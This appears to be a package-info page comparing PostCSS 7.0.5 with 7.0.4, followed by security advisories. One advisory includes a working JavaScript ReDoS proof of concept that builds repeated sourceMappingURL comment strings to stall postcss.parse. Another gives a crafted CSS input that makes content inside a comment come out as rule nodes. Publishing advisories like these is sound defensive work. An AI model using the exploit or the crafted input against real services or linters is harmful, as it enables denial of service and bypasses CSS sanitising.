PostCSS version 7.0.5 is a minor update to the popular JavaScript tool for transforming CSS with plugins. It was released on October 2, 2018, following version 7.0.4, which was released on September 27, 2018. Both versions share the same core dependencies: chalk for stylized console output, source-map for debugging, and supports-color for color support detection. Both are licensed under MIT and maintained by Andrey Sitnik.
While their functionality remains largely the same, there are subtle differences. Notably, version 7.0.5 ships 35 files in its distribution package with an unpacked size of 591,565 bytes, while version 7.0.4 contained 36 files with an unpacked size of 593,703 bytes. This reduction in files and size likely reflects minor optimisations, bug fixes, or the removal of redundant resources.
Developers migrating from 7.0.4 to 7.0.5 can expect a seamless transition since the core API and dependencies remain unchanged. Existing plugins and workflows should function without modification. The reduced package size of the newer version could lead to marginal improvements in installation time and disk space usage, offering a slight advantage for projects concerned with performance and efficiency. Reviewing the changelog for the specific details of the changes is always recommended to ensure full compatibility and understanding of the update.
Vulnerabilities affecting version 7.0.5 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")

function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters that use PostCSS to parse external, untrusted CSS. An attacker can craft CSS so that it contains parts which PostCSS parses as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite having originally been inside a comment.